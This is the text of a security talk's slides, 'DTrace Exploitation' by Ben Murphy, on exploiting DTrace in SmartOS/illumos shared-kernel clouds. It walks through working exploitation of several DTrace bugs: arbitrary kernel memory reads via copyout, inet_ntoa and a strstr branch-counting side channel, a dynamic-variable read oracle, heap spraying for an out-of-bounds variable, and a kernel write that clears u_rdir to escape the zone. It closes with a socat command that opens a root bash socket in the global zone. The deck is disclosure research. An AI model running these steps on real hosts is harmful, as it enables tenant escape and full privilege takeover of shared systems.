DTrace Exploitation
Who am I?
Why DTrace?
- Joyent Public Cloud
- Shared Kernel
- 17k Lines of C Code
➜ illumos-joyent git:(master) ✗ wc -l .//usr/src/uts/common/dtrace/dtrace.c
17073 .//usr/src/uts/common/dtrace/dtrace.c
Shared Kernels in the Wild
- Amazon Lambda Functions
- Heroku
- Red Hat OpenShift
- Google Cloud Functions (?)
Shared Kernels on VMs
- Heroku / Amazon Lambda Functions
- Strictly worse security than VMs
- Strictly worse security than shared kernels
- Worse performance than shared kernels
SmartOS Hardening
- kmem_flags
- REDZONE (0x4)
- TEST (0x2)
- SMEP
- SMAP
DTrace Internals
- Bytecode based interpreter
- 8 registers
- Variables indexed by integers
- Supports 'raw' pointers
- Memory dereferences checked for validity
OP
R1
R2
RD/RS
LABEL
RD/RS
VAR/INT/STRING
DTrace Vulnerabilities
- 5 Arbitrary Kernel Memory Reads
- 3 Zone Escapes
DTrace Copyout
copyout(void* src, uintptr_t user_addr, size_t length);
- Copy Kernel Memory to Userspace
- No check whether `src` access is permitted
Copyout Implementation
case DIF_SUBR_COPYOUT: {
uintptr_t kaddr = tupregs[0].dttk_value;
uintptr_t uaddr = tupregs[1].dttk_value;
uint64_t size = tupregs[2].dttk_value;
if (!dtrace_destructive_disallow &&
dtrace_priv_proc_control(state, mstate) &&
!dtrace_istoxic(kaddr, size)) {
DTRACE_CPUFLAG_SET(CPU_DTRACE_NOFAULT);
dtrace_copyout(kaddr, uaddr, size, flags);
DTRACE_CPUFLAG_CLEAR(CPU_DTRACE_NOFAULT);
}
break;
}
Copy Check
void
dtrace_copyout(uintptr_t kaddr, uintptr_t uaddr, size_t size,
volatile uint16_t *flags)
{
if (dtrace_copycheck(uaddr, kaddr, size))
dtrace_copy(kaddr, uaddr, size);
}
static int
dtrace_copycheck(uintptr_t uaddr, uintptr_t kaddr, size_t size)
{
ASSERT(kaddr >= kernelbase && kaddr + size >= kaddr);
if (uaddr + size >= kernelbase || uaddr + size < uaddr) {
DTRACE_CPUFLAG_SET(CPU_DTRACE_BADADDR);
cpu_core[CPU->cpu_id].cpuc_dtrace_illval = uaddr;
return (0);
}
return (1);
}
IOCTL DTrace Technique
syscall::ioctl:entry / arg1 == 0xDEADBEEF /
{ copyout((void*)arg2, (uintptr_t)arg3, arg4); }
char buf[sz];
ioctl(666, 0xDEADBEEF, addr, buf, sz);
Dumping Processes
- Linked list of processes at known address
- Use libctf in code to resolve symbols / offsets
dtrace -n 'BEGIN{ print(&`practive)}'
CPU ID FUNCTION:NAME
0 1 :BEGIN proc_t ** 0xfffffffffbc79eb8
Process Structure
typedef struct proc {
...
struct as *p_as; /* process address space pointer */
struct proc *p_next; /* active chain link next */
struct proc *p_prev; /* active chain link prev */
struct pid *p_pidp; /* process ID info */
caddr_t p_brkbase; /* base addr of heap */
struct user p_user; /* (see sys/user.h) */
} proc_t;
typedef struct user {
...
char u_comm[MAXCOMLEN + 1]; /* executable file name from exec */
char u_psargs[PSARGSZ]; /* arguments from exec */
...
} user_t;
Example Output
./global_ps
PID COMMAND PSARGS BRKBASE
8024 global_ps ./global_ps 0x414b90
8015 vim vim secret.txt 0x81f8be8
./global_ps segment -p 8015
ADDRESS SIZE FLAGS
0xfec2f000 4096
0x81ef000 188416 [heap]
KPM VBase
- Need to create new page table entries
- Need memory to put the new page table entries
- Needs to create new page table entries
Solution
- Map entire physical memory at virtual offset
- kpm_vbase in SmartOS
Read User Memory
- Convert user address to physical address using kernel segment information
- Read physical memory using kpm_vbase
- Similar technique to Ret2User
inet_ntoa Vulnerability
- no dtrace_canload check
- use inet_pton to convert address back to bytes
- reads 4 bytes at a time
- can read 8 bytes with inet_ntoa6 but have to deal with tricky edge cases
string inet_ntoa(ipaddr_t *addr)
inet_ntoa Code
case DIF_SUBR_INET_NTOA:
case DIF_SUBR_INET_NTOA6:
case DIF_SUBR_INET_NTOP: {
...
if (af == AF_INET) {
/*
* Safely load the IPv4 address.
*/
ip4 = dtrace_load32(tupregs[argi].dttk_value);
dtrace_load##
dtrace_load##bits(uintptr_t addr) \
{ \
size_t size = bits / NBBY; \
/*CSTYLED*/ \
uint##bits##_t rval; \
int i; \
volatile uint16_t *flags = (volatile uint16_t *) \
&cpu_core[CPU->cpu_id].cpuc_dtrace_flags; \
\
DTRACE_ALIGNCHECK(addr, size, flags); \
\
for (i = 0; i < dtrace_toxranges; i++) { \
if (addr >= dtrace_toxrange[i].dtt_limit) \
continue; \
\
if (addr + size <= dtrace_toxrange[i].dtt_base) \
continue; \
\
*flags |= CPU_DTRACE_BADADDR; \
cpu_core[CPU->cpu_id].cpuc_dtrace_illval = addr; \
return (0); \
} \
\
*flags |= CPU_DTRACE_NOFAULT; \
/*CSTYLED*/ \
rval = *((volatile uint##bits##_t *)addr); \
*flags &= ~CPU_DTRACE_NOFAULT; \
\
return (!(*flags & CPU_DTRACE_FAULT) ? rval : 0); \
}
inet_ntoa Example
> dtrace -n 'BEGIN{ print(inet_ntoa((in_addr_t*)&`_mmu_pagemask))}'
dtrace: description 'BEGIN' matched 1 probe
CPU ID FUNCTION:NAME
0 1 :BEGIN string "0.240.255.255"
Dynamic Variables
- pre-allocated hash map
- supports multiple keys
hash[key1, key2, key3] = value;
Hash Chunk
hashval
*next
*data
nkeys
*key value
key size
...
*key value
key size
DATA
dtrace_dynvar_t
Overwriting Chunk Metadata
- checks if writing to any of the 'metadata'
chunkoffs = (addr - base) % dstate->dtds_chunksize;
if (chunkoffs < sizeof (dtrace_dynvar_t))
return (0);
- dtrace_dynvar_t is a dynamic struct
- can write to key value in second tuple
- key value is a trusted pointer
Dynamic Variable Memory Read Oracle
- Create a hash with only room for 1 chunk
- Insert a value into the hash with the byte to check
- Find the address of the second key
- Overwrite the address with a kernel pointer
- Test if the byte value matches
- If there is no match, DTrace triggers an overflow error
char buf[1];
buf[0] = 0x1;
hash[1, buf] = 'h';
addr = &hash[1,buf][0] - 0x28;
*(void**)addr = &`dtrace_dynhash_sink
print(&hash[1,buf][0])
DTrace strstr
string strstr(const char *s, const char *subs)
- checks if substring is contained in string
- hidden parameter limit which is global string size
strstr Implementation
case DIF_SUBR_STRRCHR: {
...
uintptr_t limit = addr + state->dts_options[DTRACEOPT_STRSIZE];
for (regs[rd] = NULL; addr < limit; addr++) {
if ((c = dtrace_load8(addr)) == target) {
regs[rd] = addr;
if (subr == DIF_SUBR_STRCHR)
break;
}
if (c == '\0')
break;
}
if (!dtrace_canload(saddr, addr - saddr, mstate, vstate)) {
regs[rd] = NULL;
break;
}
libcpc
- API to activate hardware performance counters
- Counters can be set to run in kernel only
- PAPI_br_ins records number of branches taken
strstr Memory Read Oracle
- set global string size to 1 so only 1 character is checked
- call strstr with address to check and a byte to check
- record branches taken in the kernel
- 645 branches => byte matches
- 646 branches => byte doesn't match
- 646 branches for all byte values => null byte
- repeat for all byte values (256)
- sometimes takes an extra branch (toxic ranges?)
Out of bounds read for variables
- STGS instruction had no bounds check
case DIF_OP_STGS:
id = DIF_INSTR_VAR(instr);
ASSERT(id >= DIF_VAR_OTHER_UBASE);
id -= DIF_VAR_OTHER_UBASE;
svar = vstate->dtvs_globals[id];
- Accesses random garbage memory?
SLAB Allocator
- SmartOS uses a SLAB Allocator
- Objects of the same size are allocated together
- The freelist for a SLAB is a stack
- CPUs also have their own magazines
- Allocate pointers to fake variables in user memory after the real pointers
Smart Solution
- Idea from 'Attacking the Core'
- Allocate memory until a new SLAB is allocated
- Use /dev/kstat
- Make dummy allocation
- Make allocation of fake pointers
- Free dummy allocation
Dummy
Fake
Free
Free
Free
Fake
Free
Free
Example kstat Output
> kstat -n kmem_alloc_64
module: unix instance: 0
name: kmem_alloc_64 class: kmem_cache
align 64
alloc 4459955
alloc_fail 0
buf_avail 32918
buf_constructed 32859
buf_inuse 36522
buf_max 69440
buf_size 64
buf_total 69440
Dumb Solution
- Spray the heap with the fake pointer allocations
- Deallocate holes
- Pray the kernel allocates into one of these holes
???
Fake
Fake
???
???
Free
Fake
???
Target SLAB
Free Block
Fake Var Pointer
Fake Var Pointer
Fake Var Pointer
Fake Var Pointer
Fake Var Pointer
Fake Var Pointer
Real Var Pointer
Real Var Pointer
Real Var Pointer
Real Var Pointer
Real Var Pointer
Real Var Pointer
SMAP
- Works except on modern processors
- Supervisor Mode Access Prevention
Solution
- Allocate Fake Variables in Kernel Space
Arbitrary Kernel Allocations
dtrace -n 'BEGIN{ x = "hello world"; print(&x[0])}'
CPU ID FUNCTION:NAME
0 1 :BEGIN char * 0xffffff00d65c7788
Kernel Arbitrary Write
- What should we corrupt?
- Single variable u_rdir on proc_t struct
- Controls the chroot
- null => no chroot
How do we get this value?
dtrace -n 'BEGIN{ print(&curthread->t_procp->p_user.u_rdir)}'
CPU ID FUNCTION:NAME
0 1 :BEGIN struct vnode ** 0xffffff00c8ed38b0
Attacking the Core Method
od -A none -j 40 -N 8 -t x8z < /proc/$$/psinfo
ffffff00c8ee9028
We have a problem
if (regs[rd] == NULL) {
*(uint8_t *)a = UINT8_MAX;
break;
} else {
*(uint8_t *)a = 0;
a += sizeof (uint64_t);
}
...
dtrace_vcopy((void *)(uintptr_t)regs[rd],
(void *)a, &v->dtdv_type);
Start from u_envp
typedef struct user {
..
uintptr_t u_envp; /* value of envp passed to main() */
struct vnode *u_cdir; /* current directory */
struct vnode *u_rdir; /* root directory */
..
}
- u_envp doesn't matter
- write 16 bytes of zero
- u_cdir can be set to null but will crash on fork
- use chdir to fix broken u_cdir
Full Privileges
echo "/usr/bin/socat UNIX-LISTEN:$PWD/badsock,fork exec:bash,stderr,setsid"
| at now + 1 minute
socat - UNIX-CONNECT:$PWD/badsock
zonename
global
ppriv $$
4553: bash
flags = <none>
E: all
I: basic
P: all
L: all
DTrace Exploitation
By Ben Murphy
DTrace Exploitation
- 1,144